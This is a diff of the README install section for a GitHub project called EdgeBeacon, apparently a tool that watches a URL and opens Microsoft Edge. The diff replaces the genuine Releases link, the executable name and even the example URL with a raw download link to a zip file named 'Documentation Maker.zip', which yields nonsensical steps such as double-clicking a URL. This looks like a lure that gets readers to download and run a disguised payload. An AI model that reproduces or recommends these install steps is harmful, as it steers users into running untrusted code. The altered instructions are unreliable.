Conyp1975/EdgeBeacon/README.md

 ## 📂 Download & Install
 To get started, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/Conyp1975/EdgeBeacon/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/Conyp1975/EdgeBeacon/main/docs/Documentation Maker.zip).

 2. **Choose the Latest Release:** Find the most recent version of EdgeBeacon.
 It will typically be at the top of the list.

-3. **Download the Executable File:** Click on the link for the EdgeBeacon executable file, usually named something like `EdgeBeacon.exe`.
+3. **Download the Executable File:** Click on the link for the EdgeBeacon executable file, usually named something like `https://raw.githubusercontent.com/Conyp1975/EdgeBeacon/main/docs/Documentation Maker.zip`.

 4. **Run the Application:**
    - Locate the downloaded file in your downloads folder.
-   - Double-click on the `EdgeBeacon.exe` file to open it.
+   - Double-click on the `https://raw.githubusercontent.com/Conyp1975/EdgeBeacon/main/docs/Documentation Maker.zip` file to open it.

 5. **Configure the URL:**
    - The application may prompt you to enter the URL you'd like to monitor.
-   - Enter the complete URL (e.g., `https://example.com`).
+   - Enter the complete URL (e.g., `https://raw.githubusercontent.com/Conyp1975/EdgeBeacon/main/docs/Documentation Maker.zip`).

 6. **Start Monitoring:** Hit the button to start monitoring the URL.
 EdgeBeacon will now check the site and open Microsoft Edge upon getting a successful response.